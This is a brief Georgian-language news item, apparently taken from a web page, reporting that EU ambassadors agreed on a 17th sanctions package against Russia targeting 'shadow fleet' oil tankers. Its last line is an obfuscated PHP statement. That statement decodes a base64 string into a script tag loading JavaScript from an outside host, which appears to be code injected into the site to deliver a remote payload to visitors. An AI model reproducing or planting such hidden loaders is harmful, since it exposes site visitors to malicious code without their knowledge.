gorgia
ავერსი jaluzi

ევროკავშირის ელჩები რუსეთის წინააღმდეგ სანქციების მე-17 პაკეტის დამტკიცების შესახებ შეთანხმდნენ, - ამის შესახებ ინფორმაციას სააგენტო „ფრანს-პრესი“ ავრცელებს.

სააგენტო „ფრანს-პრესის“ ცნობით, სანქციების ახალი პაკეტის სამიზნეს, რომელსაც ევროკავშირი უახლოეს დღეებში დაამტკიცებს, რუსეთის „ჩრდილოვანი ფლოტი“ წარმოადგენს.

Reuters-ის ინფორმაციით, სანქციები რუსეთის „ჩრდილოვანი ფლოტის“ ასობით ნავთობტანკერის წინააღმდეგ დაწესდება.

ასევე, სანქციების მე-17 პაკეტი რუსეთის მიერ ადამიანის უფლებების დარღვევის, ქიმიური იარაღის გავრცელებისა და ჰიბრიდული საფრთხეების წინააღმდეგ შემზღუდველ ზომებს ითვალისწინებს.

133
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");